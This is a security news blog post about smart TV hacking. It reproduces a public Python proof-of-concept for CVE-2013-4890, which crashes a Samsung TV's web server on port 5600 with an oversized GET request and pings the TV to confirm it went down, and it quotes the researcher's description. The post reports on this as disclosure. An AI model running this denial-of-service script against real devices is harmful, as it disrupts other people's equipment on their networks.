It is known that smartTV hacking is a reality, these devices are connected to the Internet and suffers cyber threats exactly as any other device. Principal security firms predict a bleak future for a large number of devices that we daily use, in a previous post on the “intelligent components” that surround us I anticipated means and methods of the cyber offensives. The massive introduction of technology in our life has dramatically increased our surface of attack, we are all potential targets and the majority of users has no awareness of the cyber threats.
It must be considered that these objects in many cases manage also a huge quantity of the user’s data and personal information, in other cases they provide direct access to the user’s environment such as the domestic LAN, or worst the possibility to spy on victims with a camera or a microphone that equip the devices.
SmartTVs are considerable privilege targets for the above reason an attacker could be interested to hack our domestic appliance with following purposes:
#!/usr/bin/python # Exploit Title: Samsung TV Denial of Service (DoS) Attack # Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com # Date: 07/21/2013 # CVE Number: CVE-2013-4890 # Vendor Homepage: http://www.samsung.com # Description: # The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request # As a results, the TV reboots... # Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :) import httplib import sys import os print " ***************************************************************************************" print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n" print " Exploit: Denial of Service (DoS) attack\n" print " Description:\n" print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request." print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n" print " ***************************************************************************************\n" # Sends the payload print " Sending the malicious payload...\n" conn = httplib.HTTPConnection(sys.argv[1],5600) conn.request("GET", "A"*300) conn.close() # Checks the response print " Checking the status... (CTRL+Z to stop)\n" response = 0 while response == 0: response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1") if response != 0: print " Target down!\n"
“I discovered a DoS vulnerability on some Samsung TV devices.The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request, and as a results, the TV reboots… Tested successfully on my Samsung PS50C7700 plasma TV.”
In the video it is possible to observe that just after receiving the request the TV would restart and repeat the process, this means that an attacker accessing to LAN where TV is installed is able to hack it, this is possible for example designing
a malware that sends requests on compromised LAN.
Who and how will manage the updates of these devices?
This will be yet another opportunity provided to the attackers for the SmartTV hacking.
Pierluigi Paganini
(Security Affairs – SmartTV hacking)
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Samsung MagicINFO 9 Server vulnerability to its…
Signal implements new screen security on Windows 11, blocking screenshots by default to protect user…
Microsoft found 394,000 Windows systems talking to Lumma stealer controllers, a victim pool that included…
CISA warns Russia-linked group APT28 is targeting Western logistics and tech firms aiding Ukraine, posing…
Cellcom, a regional wireless carrier based in Wisconsin (US), announced that a cyberattack is the…
Cryptocurrency exchange Coinbase announced that the recent data breach exposed data belonging to 69,461 individuals.…
This website uses cookies.